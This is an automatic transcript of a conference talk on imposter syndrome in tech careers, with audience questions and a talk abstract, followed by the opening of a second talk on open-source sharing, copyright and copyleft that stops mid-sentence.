Come on, y'all! Thank you everyone for joining us for the Fraud Police are coming, Work, Leadership, and Imposter Syndrome. For those of you who like Twitter, like us. Here is all of our Twitter information. You can find Amanda at Captain Pollyanna, me at Babe from Toyland, and we have a session hashtag which is Imposter's Unite. So tweet away. So how did we get here to be talking to all of you about Imposter Syndrome today? It started with me getting mad on the Internet. I really enjoy reading career advice articles and I've been seeing a lot of them about Imposter Syndrome a couple years ago. I read them and I read them and it wasn't that Imposter Syndrome didn't seem real to me, it was that the advice didn't seem good. And so I started talking to people, I started tweeting about it, I talked to Amanda about it, and this was a couple of days before Bar Camp Philly in November. And Amanda kind of strong armed me into co-presenting a talk on Imposter Syndrome, which I might add I did not want to give because I did not feel qualified to speak on the subject. So we started talking last November as Brianna mentioned at a bar and I feel like we haven't stopped since. I really learned about Imposter Syndrome that night and I identified really strongly with it and I just dove in. I learned as much as I could, we read as much as we could between our conversation in Bar Camp Philly and when it came time to present, we told people what we knew and then we sat back and waited for questions. And we got a lot of people telling us stories then and throughout the rest of the past seven or eight months. People that were feeling this way too. And I just felt, and Brianna I know feels, that it's so important to talk about this. So we're so excited to be having this conversation again today with you. Alright, so to start, what is Imposter Syndrome? The term was coined in 1978 by Pauline Rose Clance and Suzanne Eims, who did the groundbreaking research on what Imposter Syndrome was. They initially did a study among high achieving women and they defined it as a failure to internalize accomplishments. It doesn't particularly sound meaningful. The way that we like to describe it is the nagging feeling that you are over-esteemed, under-qualified and on the verge of being found out as a fraud. So we wanted to keep having this conversation because not everyone knows the term, even though they might be feeling it. So if you've already self-identified and you're in good company, just look around you, guess who else feels like an imposter? This guy. Einstein was quoted as saying, the exaggerated esteem in which my life work is held makes me feel very ill at ease. I feel compelled to think of myself as an involuntary swindler. Maya Angelou said, I have written 11 books, but each time I think, uh oh, they're going to find out now. I've run a game on everybody and they're going to find me out. Now we have Jordy Foster, a confident actress who's been in tons of movies. When she won her first Academy Award, she was quoted as saying she thought it was a fluke. It was the same way when I walked out on the campus at Yale. I thought everyone would find out, they'd take the Oscar back, they'd come to my house knocking on my door and say, we meant that for someone else. We meant that for Meryl Streep. Meryl Streep said, I don't know how to act anyway, so why am I doing this? The point is that we've heard about imposter syndrome from people in basically every profession that we've talked to. Professors, researchers, programmers, bankers, real estate agents, designers, people in every stage of illustrious careers. All of them share similar stories. In fact, some research shows that about 70% of people suffer from imposter syndrome. I personally think that might be an underestimate because this is 70% of people studied who admitted that they have symptoms of imposter syndrome. When originally the studies were done, imposter syndrome was thought to be a phenomenon that was present mostly in women, high achieving academic women as Breonna mentioned. As time has gone on, it's clear that it affects people in every age, race, gender, industry. Often it affects male imposter doubly because they're already feeling like an imposter in their role. And then they feel like they shouldn't be having these feelings anyway, so it's like imposter times too. Right. There's that high achieving women research that we talked about at the beginning and part of what was interesting about that and part of what led to more research being done among women exclusively was that part of the identification for imposter syndrome was rooted in gender roles. But as time has gone on, not only have we seen how this affects people from all genders, but also how it affects people who are different minorities in whatever context they're a minority in. For any of you with us so far, you know the feelings and you know you're not alone. Next up are some big indicators that you might relate to even if you haven't yet. So we're going to talk about the big six. And these are six big factors that were identified by researchers, Sokoku and Alexander when they wrote the paper called the imposter phenomenon. The first of the big six is the imposter cycle. And we've drawn out the imposter cycle. Just take it in. Feel like the emojis speak louder than words, but we'll go through the words anyway. So it begins up here with a new project or task. Could be big or small. It can be a little exciting, but with that excitement can immediately come anxiety, self doubt and worry creeping in. So you have to begin and oftentimes you begin with furious over preparation for hours upon hours and days upon days. Sometimes also procrastination. Also for hours or days upon days. The thing is these two things can also come hand in hand. They can both be happening simultaneously on the same day. Inevitably because you're smart and you're talented, you accomplish the goal. You achieve something and it's immediately a feeling of relief. You're like, okay, it's done. It's off my plate. This is great. I can move on. But then you start getting feedback. Even if the feedback is overwhelmingly positive, great feedback, you're still in your head potentially discounting this feedback as either luck. Like I just got lucky. This wasn't really meant to happen. Or it's over. You're looking at the over preparation and thinking how you expended so much effort, more effort than maybe your peers would have had to expend. And that if you'd spent more time in it, it would have been even better. But essentially it's bringing you back around to that increased sense of fraudulence, the feelings of anxiety and self doubt. So as a case study for the imposter cycle, I like to use our own talks on imposter syndrome. I apologize at how meta this is. I hope everybody has had enough caffeine to deal with us. But starting off in the new project or task, I'm going to start off with the talk, the version of this talk that we did in January at Panama in another room in this very building. Because the bar camp talk was such a last minute or deal. But for that one, we had a good two months that we knew what we were up against. And so the anxiety and the self doubt and the worry all started to come into play. As soon as we felt that there might be some expectations as to the quality of our imposter syndrome talk. There had been some people at the off the cuff one we did at bar camp. But for those of you who have not been to a bar camp, expectations tend to be relatively low. It's an unconference where you decide what the programming is the day of. And so it's very casual in terms of giving talks. This was going to be an actual talk that people came just to see. So naturally we jumped straight in to the procrastination slash over preparation phase. For me that looked like going through my college alumni JSTOR account and looking at every single possible thing I could find on imposter syndrome, imposter phenomenon, and every variation thereof. And then also watching a lot of parks and rec and West Wing. I was also doing that this weekend. If you look at my Instagram and my Twitter feeds, you'll see this cycle wonderfully illustrated. Like many people, I switch back and forth between the procrastinate and the over preparation one very, very frequently. You may have experienced this yourself. Then after the talk that was the accomplishment. People said we did a pretty good job at it and I just discounted the feedback on that right there. People enjoyed it. Not said we did a pretty good job on it. And then we felt a little bit of anxiety about how it went. If it was just because people never heard of imposter syndrome before and it was their introduction to the concept. And after that you're rewarded with another project or task, usually one that's slightly heavier or slightly more difficult than the task before it. In this case, we are here. Alright, so number two of the big six, and they're all much shorter after the first one, I assure you. The need to be special or the very best. This manifestation of imposter syndrome is the one that keeps you as a big fish in a small pond. Or where you focus on other people's perceptions of you rather than your own perception of how hard you worked. The next is the quest to be superhuman. And I know many of you may know this, but our expectations of ourselves are often a lot greater than the people around us have of us. Our colleagues, our friends, our loved ones, even our bosses. With our jobs, we often set these really aggressive, sometimes unrealistic, sometimes superhuman goals for us. And at home we often double these expectations, trying to tick a hundred things off of our to-do list, and we'll get more to that later. The quest to always be doing more and the eventual burnout leaves us feeling like a fake. If I were really good at my job, I could handle all of this, and even though this might be too much. Fear of failure. Who has heard the phrase, fail fast before? Anybody ever notice how they really undersell how much it sucks to fail? We talk a lot about failing fast and failing big, but falling on your face sucks. Especially when you're constantly rewarded for doing well on a task by having to perform on a larger and larger stage or in front of more people. And this also leads into hearing success, which is something we'll talk about in a little bit more. Next is the denial of competence or the discounting of praise. When we describe our accomplishments with words like just or merely or only or minimizing them. Then when we're complimented on our work and praised for our skills, and we say, well, it could have been better. Or you see, I just got lucky. Or thanks. But we're feeling fraudulent and thinking that discounting this praise is making us more humble. And if we just accepted it, it might feel like cheating. Unfortunately, you're also telling the person praising you that they're wrong, and that's not great either. The last of the big six is fear and guilt about success. This manifests in a few different ways. One of them is not wanting to become successful in case you fail, which is tied to number four. There's also guilt about success that's related to, did I deserve this? Should I have been the one to get this? And also create distance when you're spending time with people who are close to you who didn't succeed in the same way that you did. You see this sometimes with first generation college students, where there's some distance that's created between them and the rest of their family. So did anybody identify with any of those big six? Did anybody not raise their hand because you wanted to see what everybody else was going to do? So what we're going to do is we're going to take about 30 seconds to sit here, and if one of them rang true to you, or all of them rang true to you, then take a minute to write down or make note of one thing that you would like to do that feeling like an imposter has been holding you back from. Assuming you've all written down the one thing that you feel like imposter syndrome is holding you back from, we'll get into the next topic, which is it gets better, right? And we have some news that may not be easy to hear, but it might make sense to some of you who are further along in your career and may have experienced these feelings for a while. And that is the more that you know, the less you think you know. Breanna will explain more. So some of you may have heard of the Dunning-Kruger effect, and this is kind of what this is about. Dunning and Kruger did research on perceived competence levels. Basically, here's an illustration done by Jessica Hagee from ThisisIndexed that shows the more education you have about a given subject, the more you know. And also, the more education that you get on a given subject, the more you know you don't know. So when you're starting to learn something new, you might think that you're a rock star immediately. An example of this that comes to mind for me is the first time I sat down and tried to learn some HTML. And I remember the feeling when I got something to say, hello world on a page that I made, and I was so proud. Like, I can make so many websites, hundreds of websites a day. And then I tried to do, I don't know, anything else. Right, so like once you have that initial understanding, you feel great, and then you start to realize how much you don't know. And wonderfully, the gulf gets bigger, the more experience you get. So if you feel like an imposter right now, it's only going to get worse from here, I am sorry. And another wonderful illustration from ThisisIndexed that displays the difference between Dunning and Kruger and the imposter syndrome. With Dunning and Kruger, you think that you're really great, and you're not, and with the imposter syndrome, you think that you're really bad, and you're great. And it's really hard to know what the difference between those two things are, but we're going to work on it. So if you're thinking, how does this affect me? And I sense your feeling you might know already. We talked about being superhuman, and trying to be superhuman. And we often have high expectations and low levels of forgiveness for ourselves. We work long hours, we miss out on sleep, and sometimes fun and enjoyment because we're trying to do all the things. We feel like failing when we can't do it all. In fact, I found a copy of Brianna's To Do List. I hope she doesn't mind if I share it. It's not actually mine, I didn't write this. Sarah Cloak wrote this wonderful list, 95 things I should do every day according to the internet, including such important highlights such as where smart professional outfit carefully selected from capsule wardrobe, shower, make sure water temperature isn't too hot. I think meditators on here about three different times. And if you are anything like me and really, really love looking at articles on the internet that tell you everything you're doing wrong about your life, this might be a narrative that you have running in your head pretty frequently. Particularly when we're looking at a culture of life hacks and 12 things that real leaders do before breakfast. And so the end result of that is that people with imposter syndrome are less likely to raise their hands. This is according to some research from Rigaue and a number of research partners that people who have imposter syndrome in the workplace are less likely to volunteer for projects that fall outside their job description. They're less likely to take on new things and they're less likely to participate in a way that is beneficial for the organization but not for them as an individual employee. And Brianna and I were lucky enough to hear a related talk by the very brilliant Amy Cuddy. She gave a TED talk about presence. She just published a book by the same name. And she talks about how our posture affects our mentality and the more space we take up, the bigger that we are, the better that we feel and the more confident and present we are. The opposite can happen if we don't feel confident and we're trying to almost go within ourselves and shrink away, making us even less likely to participate, to put ourselves in situations where we might not know everything and, like Brianna said, more less likely to raise our hands. And so what does that wind up feeling like? Self-doubt. You're less likely to start new things. Like I said, you're less likely to take on new projects and you're not very good at evaluating your own performance. Anxiety. I think we've all felt something like this. The feeling of, is it all going to come crashing down? What if I can't pull it off tomorrow? Fear of failure and fear of success. Then the feeling of isolation. And this seems to be big in some of the people that we've talked to that didn't really know imposter syndrome was so common. It's the feeling that no one else feels this way, that you're all alone, everyone else seems confident, knows what they're talking about, and that the people around you and your peers are smarter than you. Shame. This is a big one for Brene Brown, if anyone else has a similar favorite researcher story teller. It's the only one I know of. But feeling embarrassed not to know things. Feeling like your work wouldn't stand up if somebody who actually knew what they were talking about were to look at it. And then last there's despair, which seems like a really heavy word, but it's that feeling of there's no way this is going to get better. I'll never catch up to my peers, and I'm stuck feeling this way always. In short. We have some solutions. Alright, so like I mentioned at the beginning of this talk, when I first started reading about imposter syndrome, I had some common advice about it that didn't sit right with me, and the number one most common imposter syndrome advice I saw was this. Fake it till you make it. I really dislike fake it till you make it. And here's why. Fake it till you make it relies on dishonesty. And it doesn't address the core issues related to imposter syndrome. The whole concept of fake it till you make it is fine to get you in the door, but then you get there, and maybe you learn the thing that you're supposed to learn, or you pick up the skill you're supposed to pick up, and then you're rewarded in some way with a promotion, or you take on more responsibility, and then you have to fake that thing. And what you wind up in is a perpetual fakeness cycle. And when does it end? So instead, think about what you value, and what the kind of place that you want to be in values. Amanda and I came up with five values of our own. The first one is curiosity. Curiosity is fundamentally incompatible with fake it till you make it. Fake it till you make it assumes that you have to act like you know everything, and curiosity encourages you to ask questions. And motivation. Motivation is what gets us up in the morning. It's what drives us to make things better, whether that means by helping people or solving problems. And your motivation is fueled by passion. And I think we can all identify that as a value that we have. Ruth, if you're already acting like you're at where you want to be, then how are you going to actually get there? Humility. And this may seem like a contradiction since I know I've been talking about accepting praise and owning your accomplishments. You can do these things and still be humble. Humility is valued because it means you're not being egotistical or vain or conceited or as I'd like to put it, a bragging jerk face. And number five, empathy. You can't hear somebody if you're too busy focused on what other people are thinking of you. All right, so when you look at this list of five values, what you see is that it's not about what you know. It's not about specific languages. It's not about any kind of itemized checklist that you could possibly address. This is about how you think and the kind of person that you are. We talked before about the six ways that you could be experiencing imposter syndrome. And what we wanted to go into next are the ways that you can leverage these feelings for good. And we present to you not just the big six, but the manageable, not that bad six. So the first was the imposter cycle, which you remember was that long journey of experiences that lead to one another that we kind of get stuck in. And the way around that is to name it. To stopping the cycle is all about recognizing that you're in it. If you can anticipate your next move or reaction, you can intervene on your own behalf. Reversing negative feelings in self-talk can be tough, but you can take this opportunity to feel empathy for yourself and those around you who may be in the same boat and may be feeling the same things that you're feeling. This is one that can be really helpful if you do the same task multiple times as well. You get to learn what your own cycle is. I know about three days ago getting ready for this talk, I knew that while I felt fine at the time that within the next 12 to 18 hours I was going to start freaking out. And I did. And then I watched CJ Craig on the West Wing and calm down. My touchstone. So number two, the need to be special or the very best. I would like to offer you there is no very best. There is no single best Python programmer in the world I can assure you. There is no single best anything in the world. And in any kind of situation where you see somebody who is supposed to be the best at anything, it's not the only way to measure the best at that thing. This may sound cliche, but you are awesome and you don't have to be number one in anything because there is no number one in anything. Be proud to be counted among your talented and intelligent and wonderful peers. And you can lift each other up, but you can't lift each other up if you're constantly trying to one up each other's accomplishments. We talked about the quest to be superhuman and trying to do everything under the sun, everything that we think we should be doing. Well, our remedy for this is to stop. Just to stop. You have to stop holding yourself to unrealistic expectations. Prioritize the important things. Assess actual knowledge gaps that you may have and start learning things that can help you. But pick one thing at a time. Choose one thing that you could start learning today or tomorrow that could help you get better at your job. But try not to set those goals for yourself where you're trying to do 10 things at once. You're not boiling the ocean. You don't have to do everything. And setting small goals for yourself is important and also being able to forgive yourself when you don't achieve all of your goals. So you don't have to do 95 things a day, even if the internet says you should. Alright, fear of failure. Redefine failure. This is a huge one. Obviously, all successful people have failed. We talk about this all the time. But taking your failures as a failure of the thing that you did and not a failure of you as a person is extremely important for addressing imposter syndrome. And this is something that almost everyone I know has to remind themselves of constantly. The next is the denial of competence and discounting praise. And we don't want to get caught up in this. Sometimes it's okay to just say thank you. It's easy to tell yourself you're being humble or you just got lucky. But if you worked hard, accept the compliments. If you're criticized, you can take it in stride. But if you're getting a compliment, remember you have to give the compliment giver the respect that they deserve. And remember that their point of view about your skills has value. Internalize the accomplishment and recognize that your skills, your drive, and your talent are what got you here. And finally, fear and guilt about success. For one thing, get out of your own way. Just acknowledge that success can be scary. That while that is scary thing, you can motivate, inspire, and kickstart your friends and colleagues toward success by displaying your own. Don't feel guilt for beating out others for awards or promotions. It doesn't mean to be ruthless. It means accept that with the responsibility that it comes with. When you are recognized for doing something, when you get a promotion, recognize that as an opportunity to lead and to help other people achieve success. Know that the success in that one instance can be a great reminder for the future. And then help bring other people to success with you. There's so much at stake for us as a culture of increasingly educated, talented, and skilled people. Most of whom don't know how great they are. For those who come after us, we need to embrace our inner imposters and talk nicely to them about how we're growing and becoming better and about how far we've already come. Remember that you deserve to be where you are, to go where you're going next, and to help others gain confidence by sharing your knowledge. We're living in a world where smart and empathetic people are self-selecting out of opportunities. It's important on an individual level, but we also know that representation matters. We are motivated to succeed when people who look like us and face challenges similar to our own succeed before we do. Leadership doesn't have to come from the top. So at this point, we'd like everybody to take a look at whatever you wrote down a few minutes ago. We hear a lot, the phrase, what would you do if you knew you could not fail? It's an unrealistic viewpoint, and we're not asking anyone that, but we are asking you to consider what is important enough to you that it's worth going through all of this stuff that we just talked about. We'd like to end the regular part of the presentation with this wonderful quote by Kelly Sudakhanek, who's a comic book writer. The shows don't limit themselves to the fights they know they can win. So thank you all for joining us. And now we'd like to take a few minutes. If anybody would like to share any of the things that imposter syndrome might have been holding them back from, or an example of experiencing imposter syndrome in your own workplaces or personal lives. Thank you so much. Thank you. Thank you. First of all, I want to thank you a lot to say this out loud. It was really great. But I have a question for you, because what about the fear that you're so ignorant about something that you can't actually realize how bad you're at it? I think what you guys are talking about here, it actually assumes that you can realize that maybe you're bad at something. But what about if you don't have that knowledge? That's a really excellent question. One thing that we originally had actually as a part of our slides, and we couldn't quite get it to work in, was about the importance of both asking better questions and providing better answers. And this is not a thing that's specifically for one individual to do. But one thing that I've seen is people have questions about something they are a really elementary understanding. They ask a question, and then the person they ask the question of says, oh, you don't know that already? Or oh, they haven't covered that with you? Or oh, how did you not figure that out yet? And so on the flip side of that, for anybody who's concerned about feeling like they don't know enough, to be sure that you're providing answers in a way that you would want to hear them. But in terms of knowing how much you know, I would recommend really getting immersed in a community of peers and helping each other. That was great. Thank you. Anyone else? If you don't have any questions, we'd love to hear if you wanted to share your experience, or anything that resonated with you about imposter syndrome, or anything with the topic that you're experiencing at work, or at home. Sure. So last year I did a talk at PyGotham for the first time. And after they accepted my proposal, that's when it all came crashing for me, because I was like, who am I? Who am I to go and talk to a bunch of people that probably are a whole hell of a lot smarter than I am, and know a lot more about this stuff? But what's really cool, especially in the Django community, I'm sure you guys can appreciate this, is the community was super supportive. Everybody's really positive. So to your point, there's definitely some risk to it, but especially if anybody, more specifically if anybody's thinking about, or hesitating about doing a talk, especially in this community, go for it, you'll be fine. Promise. I promise you'll be fine. That's great. Thank you for that. And something we heard that I'd like to share is, we were talking about this before we came in here today. One of the things that Amy Cuddy spoke about in her talk about presence was, when she gives a talk, one of the primary things that she does to feel comfortable is to trust her audience. So going into a presentation or to a talk with the knowledge that on the whole, people are good people, and they want to listen to what you have to say, and they are curious, and they are empathetic. And I think the Django community is a really good example of a place where you can trust your audience. I always have an issue where I feel if I'm not the best at something, I'm automatically the worst at something, which always gets in my way. And to prove that a little bit, I was using the wrong hashtag through the entire talk. And then I got there and I'm like, ah, this is horrible. So will you please forgive me? Yes, absolutely. Also, there are two ways to spell imposter, and I didn't clarify which one we were using at the beginning, so that might be my fault. Here we go. It's kind of nerve wracking. Get up to this mic. I guess I got a comment because starting out, not having ever been hired in the tech field, but really liking it, you go online, try to get help, and we've already had talks on this and everything, but you might write in to Stack Exchange a question, and then somebody writes back, and it's like, go study here. Why not study this before you ask a question? So it's really hard because you really don't know much. But I feel like now I've realized that if I'm just focusing on what I want to do, I'm doing projects that I like, and I'm so curious about them that it just doesn't matter as much anymore, and all that's kind of going away. And I feel like I'm just falling my heart. And that's why I'm here. It's kind of cool, but you guys are awesome, by the way. I mean, like, this is a cool place to be. So, yeah. Thank you. I would like to share kind of two different varieties of this that I see in myself. One is I don't think I unrightfully think of myself as somebody who has to fight with laziness. I like it when things work and they work well, and I want to get to that point immediately. And I know this about myself, something I struggled with my entire life since I was a teenager. Probably before, but nobody pays attention when you're eight. But in trying to deal with that, in trying to make sure that I don't slip into that kind of laziness, I almost get into kind of like, I feel like an inverse fractal. You know, not the kind that goes out and gets more detailed because you can see it because it's bigger, but the kind that keeps going inwards, you know, infinitely. You know, and that's really hard because it's a matter of, unlike the examples that you gave in your talk where, you know, people will put in 12-hour days because, you know, oh, I have to get this done to prove something because they will get it done. Sometimes I find myself not getting it done. You know, I'm putting in those 12-hour days and it's not getting done because it's not perfect. Or, you know, the other thing in the open source community is, you know, like the last fellow just mentioned, is that we tend to be rather ruthless. Not necessarily the Django community, but, you know, in the open source community. With new people. You know, we get on their cases about, you know, well, you read all those man pages. Didn't you go to read the docs and read that, you know, 400 pages of documentation and understand everything perfectly the first time? Because, you know, there are probably a few of us that can do that and most of us can't. But it's also two is kind of recognizing one's part in the term inner asshole. Because we feel that with ourselves. We're like, I haven't done enough groundwork to ask that question yet. Or, I want to fix this thing in this particular project. But this is absolutely not up to the standards of the project, you know, the people in the project. And, you know, you don't even give them the opportunity to tell you this is garbage. You know, you just kind of, you know, plug yourself into that. And ultimately, you know, in six months, you'll have the perfect patch set. But in the meantime, you know, it's still broken. So, anyway, I just wanted to. Thank you for that. I'd imagine that's not unrelated to the number of web developers I know who don't have their own personal websites. Thank you so much for this talk. I really appreciate that you came at it from the perspective of like knowing that we all occasionally or maybe frequently have this imposter syndrome and we, and how to sort of address that within ourselves. But I also feel like I often find myself in a different position, which is that I often find that I am in a group, you know, whether that's in a workspace or with my friends, where I actually feel like I have a fair amount of confidence. And I feel like sometimes people around me have less confidence than, you know, that they deserve. And I would love to hear a few thoughts on how you create environments like conferences or workspaces or even like how you deal with it in your social groups, you know, how you create places that support people who are experiencing some imposter syndrome. Yeah, I think we touched on that a little bit, what we were talking about succeeding and how when you succeed, you're not only benefiting yourself and the work that you've done, but you're able to inspire others. And it goes back to what Brianna was saying before about giving good answers when people ask you questions and not being the guy or the girl who says, oh, you should have read that in the documentation or, oh, you should know that already or why haven't you learned that? But being the person that answers questions in a really helpful way and in a way that can build people's confidence and pointing people in the direction of resources that they might not know about that can help them build their knowledge and continue to grow as developers and as people and being able to kind of be supportive to your close network so that when you're introduced to someone or you speak with someone outside of the network at a conference like this that you feel like you have practiced in being supportive and in being empathetic and in answering people in a clear way that helps them. But also default to checking in with people to make sure that they have the necessary baseline knowledge for whatever conversation you're about to have. I know that one thing that has made me feel like an imposter several times, several is an understatement, many, many times in the past is being part of a conversation and then realizing about two minutes into it that I don't know what's happening and 20 minutes into it that I haven't known what's happening the entire time. And then there's also the assumption that I know what other people think I know what's going on and it's awful. Thanks for the question. Thank you. I want to do my sharing portion now. So I am a, I work in IT for a university and I haven't completed a formal education and that is terrifying. It's terrifying to say to a large group of people, this is the second time I've heard your talk and it is the second time I've had the chance to share this with a large group of people and it feels, it felt better the first time, hoping it makes me feel a little bit better this time so I just want to say thank you for, you know, giving this talk. I, some, I think you might have been the one in this talk to say, I don't know exactly where I heard this, but I'm reminded that the people who hired me are confident, are new this about me before they hired me, throughout my career and are confident in my ability to do my job. And I have to remember that when I'm, you know, doing my job because otherwise I'm terrified so thank you. Thank you, Ryan. Thank you guys for your speech. It really resonated with me, kind of like, I'm sorry I don't know your name, but like you're saying, I'm self-taught too. And kind of when you first start out, you kind of don't think you're a programmer and you get to be an expert at like all these things. And I guess just more comment, like if you're reading stuff and just doing it, even if it's just like following the examples, you're still a programmer. Don't, don't not call yourself one because you don't think you have the skill level, you're, you're getting there. So thank you. Yeah, that's definitely important. Thank you so much. There was a survey going around recently and this is terrible. I should not be saying this into a microphone because I have no citation information for this whatsoever. But there was a large survey of developers. I can't remember where it came from. It was 48%, I believe, of developers in the survey where did not have any kind of computer science degree, which is not surprising anecdotally, but I've spoken to so many programmers that feel like it's just them, that they don't have a degree or they don't have one in Compsi. Okay. So I'll move this a little bit too short for the mic. Hi. So I guess I just kind of wanted to come down and speak even though like I'm freaking out right now. Because I just, because I didn't notice a whole lot of, well, at least this gendered female coming down. So I kind of wanted to represent. I just wanted to share that I'm actually a sysadmin. I'm not a developer. So that's like number one. And like, I don't even know what I'm doing here. But like, it's also very traditionally male dominated, just like programming as I assume, but the whole Nick, Nick Dude vibe is very, you know, strong. And so that even so even just admitting that I feel like an imposter a lot of times makes me feel like that some like this is going to have like really bad repercussions for me in the workplace. I actually work at Wharton here. So there's probably a lot of people in this room that I'm like afraid to find my supervisor is not here. Thank goodness. So I can say this, but no one telling him that I have no idea what I'm doing on my job every day. But like, that's what I feel like. And there's probably people in this room who think I'm an idiot too. I don't care about you either. But like that's sort of the general thought process that like, I guess, goes through my head every day. And I have to try to read about imposter syndrome on the internet and I kind of try to remember myself and go through these steps. But it's like, it's a process every day. I've got to wake up and remember. Even if you think you're an idiot, you're the only idiot still doing this job. So you've got to like, you know, take yourself up. Thank you. Thank you. Thank you. Vertically challenger. I thought one of the most interesting things you said was that people with imposter syndrome and you know who you are, don't raise their hand. It's much easier to be smart if you set the agenda. So if you have someone who's giving you a coding exam and they want you to rebalance a red black tree or something like that and you vaguely remember that from way back when, you're going to look like a fool. It's the person who's asking the questions who has a lot of power. So if you put yourself in the position where you keep your hands down, you're never the person asking the question. So I think the counterintuitive part of the solution is to be the person who stands up and talks. The more you hide, the worse it is. Better to stand up and give it a shot. And even if you get shot down first time, learn from that and get up again and again and again until he holds you down. That's great. That's very insightful. Hi. So in about 45 minutes, I'm going to be standing there and I'm going to be giving a talk and I'm feeling pretty imposter about it right now. What did you guys do to psych yourselves up for this one? Thinking back to an hour from now, I think a lot of what we have tried to keep in mind and what we've told people actually as we've had these conversations for the past seven or eight months is that your set of knowledge, your set of skills is different from anyone else in this room. And there's, I want to say it's like a Venn diagram or close to a Venn diagram that people think of or that has been seen when thinking of imposter syndrome. And it was what everyone else knows and what I know being a very small part of that. But in reality, what someone else knows and what you know may have overlap, but you still have a lot to provide and a lot to offer. So trying not to go into a presentation or a talk, thinking that your audience knows everything you're already about to say and they're not going to be learning anything and they're going to be judging you and they're going to be sitting there doing something else. In reality, people are here and people are going to be at your talk because they want to hear what you have to say. And you know things that they don't know yet and you're going to be able to impart information on them that is new and that's exciting and that will potentially inspire them to do something great. Also, the layout of this room is terrifying as a speaker, but the people are really nice. All right. Thank you everyone for joining us. Thank you.
|
What is imposter syndrome? It's a failure to internalize your accomplishments. It's the nagging feeling you don't know enough, haven't done enough, don't have enough experience to do your job, land a new account, publish a new paper. It's feeling like a fraud and that you're about to be found out. The term was coined in a study by Pauline Rose Clance & Suzanne Imes in 1978 having to do with the habits and behaviors of high-achieving women, but it's recently become a hot topic in tech and career conversations - with good reason. Who does it affect? Originally a phenomenon studied among women in academic fields, studies (and anecdotal evidence) have shown it affects just about everyone. Sheryl Sandberg, Meryl Streep, and Maya Angelou have all commented about their own experiences with imposter syndrome. After we've asked, so have most of our friends and colleagues. We combine research with personal experience to provide the Big Six signs you might have imposter syndrome, so you can recognize the symptoms in yourself. How is it affecting me? Imposter syndrome can make us feel like we need to be super-people, adding and adding to our goals each day, with no end in sight. It means we might be less likely to raise our hands for new projects because we don't think we know enough. It might keep us from speaking up in meetings, seeking promotions, or talking at conferences. It can bring feelings of self-doubt, anxiety, fear, alienation, isolation, shame or despair. It can be paralyzing to a person's career. Does it get better? Thanks to the Dunning-Kruger effect, the more you learn, the more you realize how much you don't know. When combined with the imposter syndrome associated with increasing achievements over time, it usually gets worse. But...there's good news. Through identifying specific components of imposter syndrome, you can sort out what's a real area for improvement and what's mostly anxiety. Dealing with imposter syndrome is often part of the price of doing new, exciting things. We can help you figure out to cope. This talk will also help you recognize imposter syndrome in friends, colleagues, and employees, and we'll help you think about how to best support them. (Hint: responding with compliments does more harm than good.) By the end of our talk, you'll to learn how you can leverage the feelings of imposter syndrome to become a better leader, colleague and human.
|
10.5446/32724 (DOI)
|
Come on, y'all! Music Hi, well, thank you very much, Adrian, and hello, Philadelphia. A little quick heads up towards the end of this talk. I am going to discuss a couple of issues around depression and burnout. So as a trigger warning, if you need to take some steps for self-care, be advised. I'll flag this again before I start that section. As Adrian said, my name is Russell Keith McGee. I've been around the Django community for a long time, including serving on the technical board, being a member of the core team. Django is an open source project, but it's not the only open source project I'm associated with. These days I'm spending most of my time working on the BeWare project. BeWare is an open source collection of tools and libraries for creating native user interfaces in Python, for desktop, but also for iOS and Android and for single page web apps. And I've been associated with a bunch of other open source projects as a user, as a contributor, as a project maintainer over the years. Now, if your parents were anything like mine, they drilled into you at a very young age that it's important to share your toys with the other children. And it's this sharing philosophy that is at the core of open source. Yes, I could tinker away with my own thing and build something useful and lock it away so that nobody else could see it. But if I share what I know, everyone gets richer for the experience. Others can see how my toys work, others can take my toys and use them, and I can use their toys to do the same. And if we work together, we can combine forces and build something truly magnificent together. However, as we grow up, we discover that it isn't quite as simple as just share. We can certainly aspire to this as a philosophy, but you have to be proactive. You have to set up the conditions that make sharing both possible and attractive. And there are people out there who weren't taught by their parents to play well with others. And so, while sharing is a good philosophy to maintain, it's also necessary to protect yourself. See this, Pacham Parabellum, if you want peace, prepare for war. Because when some nefarious individual has stolen your toys, it's the worst possible time to discover that you're not protected. What I'm presenting here is a redux of the things that I've picked up in my 20-something year as a software engineer preceded by another 10 years as a software enthusiast, and in particular from the experience I gained from my role as being president of the Django Software Foundation. The role of the DSF was and is to be the coordinating entity around the Django project. The DSF is charged with ensuring that the Django as a project can continue to exist. This means establishing the conditions that enable Django to thrive and providing the big stick of protection for the project's assets. Okay, so let's take a look at a couple of areas where you need to have your wits about you if you are going to be sharing your toys with others. Start with copyright. What is copyright? Copyright is the right created in law, granting a creator of an original work the exclusive rights to decide how that work is used and distributed. Copyright is granted immediately and by default to the person who creates the piece of work when they create it. If you write a song, write a book, write some software, you are the creator of that work. And you have the right to decide how that creation will be used. A copyright, using the word as a noun there, is property. It's intellectual property. It's something that can be bought and sold. It can only be owned by a single legal entity at any given time. And I say entity there because it can be a company that owns it. If you have a copyright, and if I have a copyright and I sell it to you, you now own it. You have the copyright for that work. Copyright isn't granted indefinitely. It's granted for a period of time. In theory, it eventually expires and when it does, the work reverts to the public domain. I say in theory because copyright durations keep getting extended, but in theory all work will eventually revert to the public domain. If you've got a tangible physical piece of property, there are obvious limitations to use. This is my phone. And if you take it without permission, you're stealing it and that's a criminal act. But I can give you permission. I can license you to use my phone and then it isn't a criminal act for you to use my phone. I can set constraints on your use. I might ask you not to tweet pooping while you have access to my phone. And lending you my phone doesn't inherently give you any property rights over my phone. You can't lend my phone to someone else unless I say you can. It's still my property. You're just using it under license. However, I can give you or sell you my phone. I can transfer my property right to you, but it makes a big difference whether I'm giving you my phone or licensing you my phone. A piece of software is intellectual property. The copyright for a piece of software is owned by someone, by default, the creator. If you want to use a piece of software, you have to either be given ownership, given the copyright, or granted a license to use that work. And it makes a very big difference which one you get. Additionally, copyright was granted to give creators exclusivity to sell copies of their work. The expectation was that people would license copies of their work in exchange for payment. But in the early 80s, the Free Software Foundation engineered a very clever legal hack. They wrote a software license that, rather than defending the rights of the creator, defended the rights of the user. And the result was copy left. Copy left, if you've heard that term, is not a replacement for copyright. It's a clever legal hack that uses copyright law to enforce the exact opposite of what copyright was intended to provide. Without copyright law, copy left wouldn't exist. So, time for a pop quiz. Who owns Django's copyright? If you answer the DSF, you are only partially correct, and by line of code count, you're wrong. Django's copyright is held primarily by its individual contributors. That's you. If you contributed code, there is a small amount of code that was written as a work for hire for the DSF. And some of the initial code was transferred to the ownership of the DSF from the journal world when the DSF was set up. But if you haven't received a paycheck from the DSF 